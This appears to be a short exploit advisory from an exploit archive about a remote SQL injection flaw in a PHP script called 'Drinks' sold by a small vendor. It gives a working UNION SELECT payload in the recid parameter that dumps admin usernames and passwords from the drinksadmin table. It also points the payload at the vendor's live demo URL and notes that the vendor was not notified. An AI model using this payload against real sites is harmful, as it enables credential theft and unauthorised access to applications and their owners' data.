HarlandScripts Drinks suffers from a remote SQL injection vulnerability.
248a7644325bc51a5e2e6d6de1b2189b58430307d7830e2d0efceee5bbcf31d3
===========================================
Drinks script.
--------------------------------------------------------------------------------------
Vendor: http://www.fivedollarscripts.com
Demo: http://www.fivedollarscripts.com/drinks/index.php
Notified: No. Probably don't care.
Price: Five bones.
============================================
Exploit:
/path/index.php?cmd=6&recid=null union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--
Live Demo:
http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--
contact: x.s7acy at gmail dot com
greetings to bobthejanitor, mason, that new president guy, and the rest.
first script blah blah blah
=============================================